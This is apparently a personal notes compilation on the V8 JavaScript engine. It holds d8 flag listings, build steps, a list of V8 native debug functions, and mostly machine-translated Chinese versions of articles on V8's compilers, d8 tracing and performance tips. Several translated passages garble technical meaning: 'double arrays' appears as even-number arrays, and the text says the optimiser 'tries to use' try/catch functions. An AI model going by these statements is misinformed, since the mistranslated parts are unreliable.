--perf_basic_prof (Enable perf linux profiler (basic support).) type: bool default: false --perf_basic_prof_only_functions (Only report function code ranges to perf (i.e. no stubs).) type: bool default: false --gc_fake_mmap (Specify the name of the file for fake gc mmap used in ll_prof) type: string default: /tmp/__v8_gc__ --log_internal_timer_events (Time internal events.) type: bool default: false --log_timer_events (Time events including external callbacks.) type: bool default: false --log_instruction_stats (Log AArch64 instruction statistics.) type: bool default: false --log_instruction_file (AArch64 instruction statistics log file.) type: string default: arm64_inst.csv --log_instruction_period (AArch64 instruction statistics logging period.) type: int default: 4194304 --redirect_code_traces (output deopt information and disassembly into file code-<pid>-<isolate id>.asm) type: bool default: false --redirect_code_traces_to (output deopt information and disassembly into the given file) type: string default: NULL --hydrogen_track_positions (track source code positions when building IR) type: bool default: false --trace_elements_transitions (trace elements transitions) type: bool default: false --trace_creation_allocation_sites (trace the creation of allocation sites) type: bool default: false --print_code_stubs (print code stubs) type: bool default: false --test_secondary_stub_cache (test secondary stub cache by disabling the primary one) type: bool default: false --test_primary_stub_cache (test primary stub cache by disabling the secondary one) type: bool default: false --print_code (print generated code) type: bool default: false --print_opt_code (print optimized code) type: bool default: false --print_unopt_code (print unoptimized code before printing optimized code based on it) type: bool default: false --print_code_verbose (print more information for code) type: bool default: false --print_builtin_code (print generated code for builtins) type: bool default: false --sodium (print generated code output suitable for use with the Sodium code viewer) type: bool default: false --print_all_code (enable all flags related to printing code) type: bool default: false
pull specific v8
After
fetch v8
do
cd v8
git checkout -b ch2681
git checkout -b track_2681 origin/chromium/2681
git fetch
v8: a tale of two compilers
@http://wingolog.org/archives/2011/07/05/v8-a-tale-of-two-compilers
this article and all articles in this site were mostly translated by Google translate with a little human polishing.
普通读者会注意到我对V8 JavaScript实现的迷恋。这确实是令人印象深刻的工程。
当V8最初宣布时,Lars Bak写道:
我希望网络社区将采用我们开发的代码和想法来提高JavaScript的性能。提高JavaScript的性能标准对于Web应用程序的持续创新非常重要。
不仅采用V8是成功的,而且在所有JavaScript实现中的“提高性能”中取得了令人瞩目的成就。
但正如威廉·吉布森所说:“未来已经在这里 - 只是分布不均匀。” 考虑到事情发生的变化,V8的许多部分根本没有记录,也许可以理解。所以当我正在加快V8与Igalia的合作时,我一直在努力记录我发现的有趣的事情,所以所有的JavaScript实现都可以学习和改进。
事实上,V8的这项研究给了我很多的想法和动机。所以也许V8的新座右铭应该是“把世界的代码变的更快,只需一个编译器”。
第一个编译:full-codegen
V8将所有JavaScript编译为本地代码。 V8有两个编译器:一个运行速度快,并且生成通用代码,而不是运行速度不高但尝试生成优化代码的编译器。
快速简单的编译器在内部被称为“全代码”编译器。 它作为函数的抽象语法树(AST)作为其输入,遍历AST中的节点,并直接发出对宏程序集的调用。 这是一张照片:
http://wingolog.org/pub/v8-full-codegen.svg
这些框表示编译过程中的数据流。只有两个框,因为正如我们所说,这是一个简单的编译器。所有局部变量都存储在堆栈或堆上,而不是存储在寄存器中。嵌套函数引用的任何变量都存储在与定义变量的函数关联的上下文对象中的堆上。
编译器开始加载和存储,以将这些值拉入寄存器以实际执行此工作。临时堆栈的顶部被缓存在一个寄存器中。复杂的情况通过调用运行时程序来处理。编译器会跟踪正在评估表达式的上下文,以便测试可以直接跳转到后续块,而不是将一个值push进缓存,测试是否为零,然后再进行分支。小整数算术通常是内联的。
实际上,我应该提到即使使用全代码编译器也是一个重要的优化,那就是内联缓存。请参阅Hölzle,Chambers和Ungar的论文【http://wingolog.org/archives/2008/10/19/dynamic-dispatch-a-followup】。内联高速缓存用于分配,一元和二进制操作,函数调用,属性访问和比较。
内置缓存也可用作优化编译器使用的类型信息的来源。在某些语句类型(如赋值)的情况下,IC的唯一目的是记录类型信息.
ast.h
The abstract syntax tree.
full-codegen.h
full-codegen.cc
full-codegen-ia32.cc
全代码编译器。 全代码编译器的大多数关键内容都在目标特定目录(4257行vs 769 + 1323行)。 目前支持的架构是ia32,x64,arm和mips。
类型反馈
V8第一次看到一个函数,它会把函数解析为AST,但实际上并没有做任何事情。 当函数首次运行时,它只运行全代码编译器。 懒惰怎么样 但是,事情开始之后,它启动了一个剖析线程,看看事情发生了,什么功能很热。
这种懒惰的坐在后视观看方式使V8能够记录流经它的类型信息。 所以在决定一个函数是否会被经常访问的时候,可以使用类型来获得一点帮助,它有一个传递给编译器的类型信息。
运行时类型反馈信息被记录并存储在内联高速缓存(IC)中。 类型反馈信息在内部表示为以这样的方式构造的8位值,使得它可以用简单的位掩码来检测类型的层次。 在这一点上,我能做的最好的就是通过源代码展示艺术品:
// Unknown // | ____________ // | | // Primitive Non-primitive // | _______ | // | | | // Number String | // / | | // Double Integer32 | / // | | / / // | Smi / / // | | / __/ // Uninitialized.
每当一个IC存根看到一种新的值时,它会计算该值的类型,并按比例将其与旧类型相对应。初始化类型值未初始化。所以如果IC只能看到Smi(小整数)范围内的整数,记录的类型将会指示。但是一旦它看到一个double值,那个类型就变成了数字;如果它看到一个对象,那么该类型将变为“未知”。非原始IC必须将接收器类型的映射存储在IC中,以便传递。在需要时,类型反馈可以解析IC stub以获取此map。
类型反馈信息与特定的AST节点(分配,属性负载等)相关联。节点的整数标识符被序列化到IC中,因此当V8决定函数经常被调用时,它可以从全代码代码解析记录的类型信息,并将其与AST节点相关联。
这个过程有点复杂。它需要在编译器堆栈中上下支持。你需要有内联缓存。您的内联高速缓存需要支持类型信息,包括操作数和结果。您需要能够遍历这些数据才能找到值。然后,您需要将其链接回AST,以便在将AST传递给优化编译器时,编译器能够提出正确的问题。
V8采取的具体策略是将数据解析为TypeFeedbackOracle对象,将信息与特定的AST节点相关联。然后V8使用这个oracle访问所有的AST节点,节点本身解析出他们可能会从oracle发现有用的数据。
最后,例如,可以询问Property节点是否是单形,在任何情况下,该节点的接收器类型是什么。看来这对于V8来说很好,因为它减少了优化编译器中的移动部件的数量,因为它不需要具有TypeFeedbackOracle本身。
type-info.h
TypeInfo 8位数据类型和TypeFeedbackOracle声明。 我不得不承认,我真的很喜欢在V8中使用C ++。 这是一个令人讨厌的工具,但他们很好。
type-info.cc
TypeFeedbackOracle的实现。 请参阅文件底部的ProcessTarget。
还要检查ast.h链接,看看类型反馈如何与AST本身联系在一起。
曲轴=类型反馈+氢+锂
一旦V8确定函数经常被调用,并收集了一些类型的反馈信息,它会尝试通过优化编译器运行增强的AST。 这种优化编译器被称为Crankshaft ,尽管该名称很少出现在源代码里。
相反,Crankshaft 由Hydrogen 高级中间表示(IR),Lithium 低级别IR及其相关的编译器组成。
Like this:
http://wingolog.org/pub/v8-crankshaft.svg
(我相信“氢(Hydrogen)”和“锂(Lithium)”的名称分别来自高(High-)低(Low-)层。)
取决于你的背景知识,但你可能已经看到过这样的图:
http://www.stanford.edu/class/cs343/resources/java-hotspot.pdf
事实上,我相信Crankshaft受到Sun在Java 6中引入热点客户端编译器的更改的高度影响。让我引用Kotzmann等人的“2008年热点客户端编译器设计”的一段话
首先,通过对字节码的抽象解释来构建编译方法的高级中间表示(HIR)。它由一个控制流图(CFG)组成,其基本块是指令的单链表。 HIR是静态单一赋值(SSA)形式,这意味着对于每个变量,程序中只有一个点被赋值给它。加载或计算值的指令表示操作及其结果,因此操作数可以表示为指向先前指令的指针。在HIR生成期间和之后,执行若干优化,例如恒定折叠,数值编号,方法内联和空检查消除。他们受益于HIR和SSA形式的简单结构。 编译器的后端将优化的HIR转换为低级中间表示(LIR)。 LIR在概念上类似于机器代码,但仍然与平台无关。与HIR指令相反,LIR操作操作在虚拟寄存器上,而不是对先前指令的引用。 LIR有助于各种低级优化,也是线性扫描寄存器分配器的输入,它将虚拟寄存器映射到物理寄存器。
该声明非常整齐地描述了Crankshaft,该论文的第2部分的其余部分在一般意义上适用。当然有一些区别。Crankshaft以AST开头,而不是字节代码。 HotSpot客户端运行时不使用类型反馈来帮助其编译器,因为它对Java不太必要,尽管它仍然有帮助。Crankshaft对异常处理程序不会做很多工作。
但是相似之处在于,V8实际上可以产生由c1visualizer(docs)读取的跟踪,这是一个用于可视化HotSpot客户机编译器内部的程序。 (客户端编译器似乎在内部被称为c1;服务器编译器似乎是opto的)。
v8 native calls
https://github.com/Nathanaela/v8-Natives/blob/master/lib/v8-native-calls.js
isNative: function() { return true },
getOptimizationStatus: function(fun) {
return %GetOptimizationStatus(fun);
},
getOptimizationCount: function(fun) {
return %GetOptimizationCount(fun);
},
optimizeFunctionOnNextCall: function(fun) {
return %OptimizeFunctionOnNextCall(fun);
},
deoptimizeFunction: function(fun) {
return %DeoptimizeFunction(fun);
},
deoptimizeNow: function() {
return %DeoptimizeNow();
},
clearFunctionTypeFeedback: function(fun) {
return %ClearFunctionTypeFeedback(fun);
},
debugPrint: function(data) {
return %DebugPrint(data);
},
debugTrace: function() {
return %DebugTrace();
},
collectGarbage: function() {
return %CollectGarbage(null);
},
getHeapUsage: function() {
return %GetHeapUsage();
},
hasFastProperties: function(data) {
return %HasFastProperties(data);
},
hasFastSmiElements: function(data) {
return %HasFastSmiElements(data);
},
hasFastObjectElements: function(data) {
return %HasFastObjectElements(data);
},
hasFastDoubleElements: function(data) {
return %HasFastDoubleElements(data);
},
hasDictionaryElements: function(data) {
return %HasDictionaryElements(data);
},
hasFastHoleyElements: function(data) {
return %HasFastHoleyElements(data);
},
hasFastSmiOrObjectElements: function(data) {
return %HasFastSmiOrObjectElements(data);
},
hasSloppyArgumentsElements: function(data) {
return %HasSloppyArgumentsElements(data);
},
haveSameMap: function(data1, data2) {
return %HaveSameMap(data1, data2);
},
functionGetName: function(func) {
return %FunctionGetName(func);
},
isSmi: function(data) {
return %_IsSmi(data);
},
isValidSmi: function(data) {
return %IsValidSmi(data);
},
neverOptimizeFunction: function(func) {
return %NeverOptimizeFunction(func);
},
getV8Version: function() {
return %GetV8Version();
},
isObserved: function(data) {
return %IsObserved(data);
},
setFlags: function(flag) {
return %SetFlags(flag);
},
traceEnter: function() {
return %TraceEnter();
},
traceExit: function(val) {
return %TraceExit(val);
},
getThreadCount: function() {
return %GetThreadCount(0);
}
v8的一些文档翻译
@from
https://gist.github.com/kevincennis/0cd2138c78a07412ef21
Installing V8 on a Mac
先决条件
安装Xcode(可在Mac App Store)
安装Xcode的命令行工具(偏好>下载)
安装depot_tools
git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git
sudo nano ~/.bash_profile
Add export PATH=/path/to/depot_tools:”$PATH” (重要)
source ~/.bash_profile
进入你想安装V8的目录,运行gclient
Build V8
fetch v8 cd v8 gclient sync tools/dev/v8gen.py x64.optdebug ninja -C out.gn/x64.optdebug
(prepare for lots of fan noise)
I’d also recommend adding some aliases to your .bash_profile:
sudo nano ~/.bash_profile
Add
alias d8=/path/to/v8/repo/out.gn/x64.optdebug/d8
Add
alias tick-processor=/path/to/v8/repo/tools/mac-tick-processor
source ~/.bash_profile
d8 shell examples
打印优化的数据
创建下面的test.js代码:
function test( obj ) { return obj.prop + obj.prop; } var a = { prop: 'a' }, i = 0; while ( i++ < 10000 ) { test( a ); }
Run
d8 --trace-opt-verbose test.js
你应该看到测试函数是由V8优化的,以及为什么会被优化的解释。 “IC”代表内联缓存,是V8执行优化的方式之一。 一般来说,“typeinfo”的IC越多越好。
现在修改test.js以包含以下代码:
function test( obj ) { return obj.prop + obj.prop; } var a = { prop: 'a' }, b = { prop: [] }, i = 0; while ( i++ < 10000 ) { test( Math.random() > 0.5 ? a : b ); }
运行
d8 --trace-opt-verbose test.js
所以,你会看到,这一次,test函数从未被实际优化。 原因是因为它被传递给具有不同隐藏类的对象。 尝试将prop中的值更改为一个整数并再次运行。 您应该会看到该函数能够被优化。
打印去优化统计
修改test.js的内容:
function test( obj ) { return obj.prop + obj.prop; } var a = { prop: 'a' }, b = { prop: [] }, i = 0; while ( i++ < 10000 ) { test( i !== 8000 ? a : b ); }
Run
d8 --trace-opt --trace-deopt test.js
您应该看到test函数的优化代码被抛出。 这里V8一直看到测试被传递一个像{prop:
Profiling
Modify test.js:
function factorial( n ) { return n === 1 ? n : n * factorial( --n ); } var i = 0; while ( i++ < 1e7 ) { factorial( 10 ); }
Run
time d8 --prof test.js
(Generates v8.log)
Run
tick-processor
(Reads v8.log and cats the parsed output)
这将显示程序大部分时间在函数上的消耗。 大部分应该在LazyCompile下:* factorial test.js:1:19。 功能名称前的星号表示已经进行了优化。
记录登录到终端的执行时间。 现在尝试修改代码到这个愚蠢的例子:
function factorial( n ) { return equal( n, 1 ) ? n : multiply( n, factorial( --n ) ); } function multiply( x, y ) { return x * y; } function equal( a, b ) { return a === b; } var i = 0; while ( i++ < 1e7 ) { factorial( 10 ); }
Run
time d8 --prof test.js
Run
tick-processor
与最后一个函数大致相同的执行时间,但是按照我们的想法,这个例子似乎应该更快。 你还会注意到,这个multi和equal的函数在列表中不存在。 奇怪,对吧?
运行d8 –trace-inlining test.js
我们可以看到,优化编译器在这里是很聪明的,并且完全消除了调用这两个函数的开销,它们将它们归结为优化的阶乘代码。两个版本的优化代码最终基本相同(如果您知道如何读取程序集,可以通过运行d8 –print-opt-code test.js来检查)。
Tracing Garbage Collection
Modify test.js
function strToArray( str ) { var i = 0, len = str.length, arr = new Uint16Array( str.length ); for ( ; i < len; ++i ) { arr[ i ] = str.charCodeAt( i ); } return arr; } var i = 0, str = 'V8 is the collest'; while ( i++ < 1e5 ) { strToArray( str ); }
Run
d8 --trace-gc test.js
You’ll see a bunch of
Scavenge... [allocation failure].
基本上,V8的GC堆具有不同的“空间”。 大多数对象都分配在“新空间”中。 在这里分配代价超低,但它也很小(通常在1到8 MB之间)。 一旦这个空间被填满,GC就会进行“清理”。
清理是V8垃圾收集的快速部分。 通常从我所看到的介于1到5ms之间 - 所以它可能不一定会引起明显的GC暂停。
清除只能通过分配来启动。 如果“新空间”从未被填满,则GC不需要通过清理来回收空间。
Modify test.js:
function strToArray( str, bufferView ) { var i = 0, len = str.length; for ( ; i < len; ++i ) { bufferView[ i ] = str.charCodeAt( i ); } return bufferView; } var i = 0, str = 'V8 is the coolest', buffer = new ArrayBuffer( str.length * 2 ), bufferView = new Uint16Array( buffer ); while ( i++ < 1e5 ) { strToArray( str, bufferView ); }
在这里,我们使用预分配的ArrayBuffer和相关联的ArrayBufferView(在本例中为Uint16Array),以避免每次运行strToArray()时重新分配一个新对象。 结果是我们几乎没有分配任何东西。
运行d8 –trace-gc test.js
没有。 我们从来没有填补“新空间”,所以我们从来没有去过。
在test.js中再试一次:
function strToArray( str ) { var i = 0, len = str.length, arr = new Uint16Array( str.length ); for ( ; i < len; ++i ) { arr[ i ] = str.charCodeAt( i ); } return arr; } var i = 0, str = 'V8 is the coolest', arr = []; while ( i++ < 1e6 ) { strToArray( str ); if ( i % 100000 === 0 ) { // save a long-term reference to a random, huge object arr.push( new Uint16Array( 100000000 ) ); // release references about 5% of the time Math.random() > 0.95 && ( arr.length = 0 ); } }
运行d8 –trace-gc test.js
可以看到有许多清除,因为我们不再使用预分配的缓冲区。 但也应该有一堆mark-sweep。
标记扫描(mark-sweep)是“完整”的GC。 当“旧空间”堆达到一定的大小时,它会运行,而且比普通清理时间更长。 如果您查看日志,您可能会看到Scavenge 约1.5ms,Mark-sweep更接近25或30ms。
由于网络应用程序中的帧预算约为16ms,所以每次Mark-sweep运行时,都至少丢弃1帧。
杂项
d8 –help记录所有可用的d8标志
有一大堆文字,但你通常可以找到你想要的东西,像d8 –help | grep 就可以找到你要的东西。
d8 –allow-natives-syntax file.js
这实际上可以让您从JS文件中调用V8内部方法,如下所示:
function factorial( n ) { return n === 1 ? n : factorial( --n ); } var i = 0; while ( i++ < 1e8 ) { factorial( 10 ); // run a full Mark-sweep pass every 10MM iterations i % 1e7 === 0 && %CollectGarbage( null ); }
…并运行d8 –allow-natives-syntax –trace-gc test.js
本机功能前缀为%符号。 这里列出了一些(有些不完整)的本机功能列表。
记录
d8没有控制台对象(或窗口对象)。 但是您可以使用print()。
比较隐藏类
这可能是我最喜欢的。 我其实刚找到它。
所以在V8中,这个概念就是“隐藏的类”(好几个段落的解释)。 你应该阅读这篇文章 - 但是基本上隐藏的类是V8(SpiderMonkey和JavaScript Core也使用类似技术)来确定两个对象是否具有相同的“形状”。
所有考虑的事情,你总是希望将相同隐藏类的对象作为参数传递给函数。
无论如何,您可以实际比较两个对象的隐藏类:
function Class( val ) { this.prop = val; } var a = new Class('foo'); var b = new Class('bar'); print( %HaveSameMap( a, b ) ); b.prop2 = 'baz'; print( %HaveSameMap( a, b ) );
运行d8 –allow-natives-syntax test.js
你应该看到true、false。 通过添加b.prop2 =’baz’,我们修改了它的结构并创建了一个新的隐藏类。
Node.js
很多这些标志(但不是全部)可与Node一起使用。 –trace-opt,–prof,–allow-natives-syntax都支持。
如果您想要测试依赖于另一个库的内容,那么可以使用,因为您可以使用Node的require()。
可以使用node –v8-options选项访问支持的V8标志列表。
v8中javascript的性能提示
将任何性能建议放在上下文中很重要。性能优化是上瘾的,有时专注于深层次的咨询首先可以从真正的问题中分心。您需要全面了解您的Web应用程序的性能 - 在关注这些性能提示之前,您应该可以使用PageSpeed之类的工具来分析您的代码,并获得分数。这将帮助您避免过早优化。
在Web应用程序中获得良好性能的最佳基本建议是:
•在您(或通知)问题之前做好准备
•然后,确定并了解问题的症结所在
•最后,处理重要问题
为了完成这些步骤,了解V8如何优化JS可能很重要,因此您可以编写符合JS运行时设计的代码。了解可用的工具以及如何帮助您也很重要。丹尼尔谈谈如何使用开发者工具,该文件只是捕捉了V8引擎设计中的一些最重要的一点。
Hidden Classes
JavaScript有有限的编译时类型信息:类型可以在运行时更改,所以很自然地期望在编译时对JS类型进行推理代价是昂贵的。 这可能会导致您质疑JavaScript性能如何在任何接近C ++的地方。 然而,V8具有在运行时内部为对象创建的隐藏类型; 具有相同隐藏类的对象可以使用相同的优化生成代码。
For example:
function Point(x, y) { this.x = x; this.y = y; } var p1 = new Point(11, 22); var p2 = new Point(33, 44); // At this point, p1 and p2 have a shared hidden class p2.z = 55; // warning! p1 and p2 now have different hidden classes!
在对象实例P2添加了额外的成员“Z”之前,P1和P2内部具有相同的隐藏类,因此V8可以生成一个单一版本的优化程序集,用于处理P1或P2的JavaScript代码。你越能避免造成隐藏类分歧,你会获得更好的性能。
因此:
•初始化所有对象成员的构造函数(这样的情况不会在之后改变类型)
•总是初始化对象的成员以相同的顺序
数
类型可以改变时,V8使用标签代表值就非常有效了。
v8使用标记来有效地表示值,当类型可以更改时。v8从使用您处理的数字类型的值推断出类型。一旦v8完成了这一推断,它使用标记来有效地表示值,因为这些类型可以动态变化。然而,更改这些类型标记有时需要额外花费,所以最好使用数字类型来保持一致,一般来说,在适当的时候使用31位有符号整数是最优的。
For example:
var i = 42; // this is a 31-bit signed integer var j = 4.2; // this is a double-precision floating point number
因此:
·更偏好可以表示为31位有符号整数的数值。
数组
为了处理大型和稀疏数组,内部有两种类型的数组存储:
·快速元素:紧凑键集的线性存储
·否则用 dictionary元素:哈希表存储
最好不要将数组存储从一个类型转换为另一个类型。
因此:
·为数组使用从0开始的连续键。
·不要预先分配大数组(例如>64K元素)到其最大大小,而是随你的增长而自然增长。
·不要删除数组中的元素,尤其是数字数组。
·不要加载未初始化或删除的元素:
a = new Array(); for (var b = 0; b < 10; b++) { a[0] |= b; // Oh no! } //vs. a = new Array(); a[0] = 0; for (var b = 0; b < 10; b++) { a[0] |= b; // Much better! 2x faster. }
此外,偶数数组更快-数组隐藏的类会追踪元素类型,并且偶数个元素的数组是unboxed(它导致隐藏的类更改)。然而,因为boxing和unboxing机制,对数组的粗心操作会导致额外的工作,如:
var a = new Array(); a[0] = 77; // Allocates a[1] = 88; a[2] = 0.5; // Allocates, converts a[3] = true; // Allocates, converts
比下面的更低效:
var a = [77, 88, 0.5, true];
因为在第一个例子中,个别的分配是一个接一个执行的,而一个[2]的赋值使得Array被转换成一个未装箱的双精度数组,但是一个[3]的赋值使它被重新生成, 转换回可以包含任何值(数字或对象)的数组。 在第二种情况下,编译器知道文字中所有元素的类型,隐藏类可以在前面确定。
因此:
•使用数组文字初始化小型固定大小的数组
•在使用小数组(<64k)之前对其进行预分配以校正大小
•不要在数字数组中存储非数值(对象)
•如果您没有文字初始化,请小心不要引起小数组的重新转换。
JavaScript编译
虽然JavaScript是一种非常动态的语言,并且它的原始实现是解释器,但现代JavaScript运行时引擎使用编译。 V8(Chrome的JavaScript)有两个不同的即时(JIT)编译器,实际上是:
•“完整”编译器,可以为任何JavaScript生成好的代码
•优化编译器,为大多数JavaScript生成出色的代码,但编译时间较长。
全编译器
在V8中,完全编译器运行在所有代码上,并尽快开始执行代码,快速生成好但不是很好的代码。这个编译器在编译时几乎不关心类型 - 它希望类型的变量可以在运行时改变。完整编译器生成的代码使用内联缓存(IC)在程序运行时改进关于类型的知识,从而提高效率。
内联缓存的目标是通过缓存类型相关代码进行操作来有效地处理类型;当代码运行时,它将首先验证类型假设,然后使用内联缓存来快速操作。但是,这意味着接受多种类型的操作将性能较差。
因此:
•多态操作优先使用单操作操作
如果隐藏的输入类总是相同的,则操作是单一的 - 否则它们是多态的,这意味着一些参数可以在对操作的不同调用中改变类型。例如,本示例中的第二个add()调用导致多态:
function add(x, y) { return x + y; } add(1, 2); // + in add is monomorphic add("a", "b"); // + in add becomes polymorphic
优化编译器
与完整编译器并行,V8使用优化编译器重新编译“热”功能(即运行多次的函数)。这个编译器使用类型反馈来使编译代码更快 - 实际上它使用了我们刚刚谈到的IC中提取的类型!
在优化编译器中,操作会被内插(直接放在被调用的位置)。这样可以加速执行(以内存占用为代价),而且可以实现其他优化。单态功能和构造函数可以完全嵌入(这也是V8中单态是一个好主意的另一个原因)。
您可以使用V8引擎的独立“d8”版本记录使用哪些优化:
d8 –trace-opt primes.js
(这将记录优化功能的名称记录到stdout。)
然而,并非所有功能都可以进行优化 - 某些功能可防止优化编译器在给定功能(“纾困”)上运行。特别是,优化编译器目前正在尝试使用try {} catch {}块的功能!
因此:
•如果您尝试{} catch {}块,则将敏感代码放入嵌套函数中:
function perf_sensitive() { // Do performance-sensitive work here } try { perf_sensitive() } catch (e) { // Handle exceptions here }
由于我们在优化编译器中启用了try / catch块,所以这个指导将来可能会改变。 您可以通过使用上述d8的“–trace-opt”选项来检查优化编译器是如何缓解功能的,这样您可以获得有关哪些函数被保释的更多信息:
d8 –trace-opt primes.js
去优化
最后,这个编译器执行的优化是推测性的 - 有时它不行,我们退出了。 “去优化”过程会抛出优化的代码,并在“完整”编译器代码中的正确位置恢复执行。稍后可能再次触发优化,但短期来看,执行速度会减慢。特别是,在优化了函数之后引起变量的隐藏类变化将导致这种去优化发生。
因此:
•优化功能后,避免隐藏类更改
与其他优化一样,您可以获得V8使用日志记录标志来取消优化的功能日志:
d8 –trace-deopt primes.js
其他V8工具
顺便说一下,您还可以在启动时将V8跟踪选项传递给Chrome:
“/ Applications / Google Chrome.app/Contents/MacOS/Google Chrome”–js-flags =“ - trace-opt -trace-deopt”
除了使用开发人员工具分析外,您还可以使用d8进行分析:
%out / ia32.release / d8 primes.js –prof
这使用内置的采样分析器,它每毫秒采样一次,并写入v8.log。
综上所述…
重要的是识别和理解V8引擎如何与您的代码一起准备构建执行JavaScript。 再一次,基本建议是:•在您(或通知)问题之前做好准备
•然后,确定并了解问题的症结所在
•最后,确定重要
这意味着您应该确保您的JavaScript中的问题,首先使用其他工具,如PageSpeed; 在收集指标之前,可能会降低到纯JavaScript(无DOM),然后使用这些指标来定位瓶颈并消除重要的指标。 希望Daniel的话(和本文)将帮助您更好地了解V8如何运行JavaScript - 但一定要专注于优化您自己的算法!